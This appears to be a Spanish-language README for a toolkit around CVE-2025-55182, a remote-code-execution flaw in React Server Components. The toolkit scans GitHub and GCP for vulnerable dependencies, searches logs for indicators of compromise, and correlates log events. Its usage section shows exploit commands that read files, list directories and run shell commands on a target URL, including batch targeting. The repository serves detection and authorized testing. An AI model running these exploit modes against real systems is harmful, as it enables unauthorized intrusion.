
Kit de herramientas de seguridad para CVE-2025-55182 (React2Shell) — escanear, detectar, correlacionar y probar la vulnerabilidad RCE de React Server Components
flight risk /flaɪt rɪsk/ — El protocolo Flight de React es la capa de serialización detrás de los Componentes de Servidor de React. CVE-2025-55182 explota una falla de deserialización en Flight para lograr RCE sin autenticación previa. Si tu aplicación usa RSC, es un flight risk.
Kit de seguridad para CVE-2025-55182 (React2Shell) — una vulnerabilidad de ejecución remota de código sin autenticación previa con CVSS 10.0 en los Componentes de Servidor de React. Escanea, detecta, correlaciona y prueba.
| Herramienta | Qué hace |
|---|---|
| react2shell-scanner | Escanea organizaciones de GitHub y proyectos de GCP en busca de dependencias vulnerables de React/Next.js. Pruebas de explotación autorizadas (safe-probe, lectura de archivos, listado de directorios, ejecución de comandos). |
| gcp-ioc-scanner | Consulta Cloud Logging de GCP en busca de patrones de Indicadores de Compromiso en múltiples proyectos y servicios K8s. Definiciones de IOC conectables. |
| gcp-log-correlator | Correlaciona eventos de registro de GCP por proximidad temporal en el mismo pod — p. ej., encuentra qué solicitud HTTP desencadenó un error de RCE. |
# Clone
git clone https://github.com/YOUR_USER/flight-risk.git
cd flight-risk
# Install dependencies
pip install -r react2shell-scanner/requirements.txt
pip install pyyaml # for gcp-ioc-scanner
# Make scripts executable
chmod +x react2shell-scanner/bin/*
chmod +x gcp-ioc-scanner/gcp-ioc-scanner
chmod +x gcp-log-correlator/gcp-log-correlator
# Authenticate
gh auth login # GitHub scanning
gcloud auth application-default login # GCP scanning + log analysis
Todos los comandos se ejecutan desde la raíz del repositorio.
react2shell-scanner/bin/scan-github \
--org YOUR_GITHUB_ORG \
--output ./results/github
react2shell-scanner/bin/scan-gcp \
--project YOUR_GCP_PROJECT \
--output ./results/gcp
react2shell-scanner/bin/scan-all \
--org YOUR_GITHUB_ORG \
--project YOUR_GCP_PROJECT \
--output ./results
python3 react2shell-scanner/cli.py https://your-app.example.com
# Simulación en seco — muestra el payload sin enviar
python3 react2shell-scanner/cli.py --dry-run --verbose https://your-app.example.com
# Leer archivo mediante RCE
python3 react2shell-scanner/cli.py --method read-file https://your-app.example.com /etc/hostname
# Listar directorio mediante RCE
python3 react2shell-scanner/cli.py --method list-dir https://your-app.example.com /app
# Ejecutar comando mediante RCE
python3 react2shell-scanner/cli.py --method exec-cmd https://your-app.example.com "id"
# Objetivos por lote
python3 react2shell-scanner/cli.py --targets targets.txt --output results.json
gcp-ioc-scanner/gcp-ioc-scanner \
--targets gcp-ioc-scanner/examples/targets-example.yaml \
--iocs gcp-ioc-scanner/iocs/cve-2025-55182.yaml \
--start 2026-01-01 \
--end 2026-04-01 \
--output ./results/ioc-scan
gcp-log-correlator/gcp-log-correlator \
--project YOUR_GCP_PROJECT \
--namespace frontend \
--pod-pattern "web-app.*" \
--trigger-filter 'severity=ERROR' \
--preceding-filter 'httpRequest.requestMethod:*' \
--window 30s \
--start 2026-04-01T00:00:00Z \
--end 2026-04-02T00:00:00Z \
--format json,markdown \
--output ./results/correlation
cd react2shell-scanner
docker compose -f docker/docker-compose.yml build
docker compose -f docker/docker-compose.yml run scanner-shell
flight-risk/
├── README.md
├── LICENSE
├── react2shell-scanner/
│ ├── bin/ # scan-github, scan-gcp, scan-all
│ ├── cli.py # CLI de pruebas de explotación
│ ├── exploit.py # Lógica de explotación
│ ├── utils.py # Utilidades compartidas
│ ├── lib/ # Asistentes Shell + Python
│ ├── vuln-defs/ # Definiciones de vulnerabilidades conectables
│ ├── docker/ # Escaneo contenerizado
│ ├── examples/ # Scripts de ejemplo
│ ├── test-app/ # Fixture vulnerable de Next.js
│ └── requirements.txt
├── gcp-ioc-scanner/
│ ├── gcp-ioc-scanner # Escáner de registros IOC
│ ├── iocs/ # Definiciones de patrones IOC
│ └── examples/ # Ejemplos de configuración de objetivos
└── gcp-log-correlator/
├── gcp-log-correlator # Correlacionador de eventos
└── examples/ # Ejemplos de correlación
gh)gcloud)jqSolo uso autorizado. Este kit contiene código de explotación. Úselo únicamente en sistemas que posea o para los que tenga autorización explícita por escrito para realizar pruebas. El uso no autorizado puede violar la Ley de Fraude y Abuso Informático (18 U.S.C. 1030) y leyes equivalentes.
MIT — consulte LICENSE.
| CVSS | 10.0 Crítico |
| Vector | Red / Sin autenticación previa / Sin interacción |
| React | 19.0.0 - 19.2.0 (corregido en 19.3.0) |
| Next.js | 14.3.0 - 15.3.5, 16.0.0 - 16.0.7 (corregido en 15.3.6, 16.0.8) |
| Causa raíz | Deserialización insegura en el protocolo Flight de React |
| Impacto | RCE completo como el usuario del proceso de la aplicación |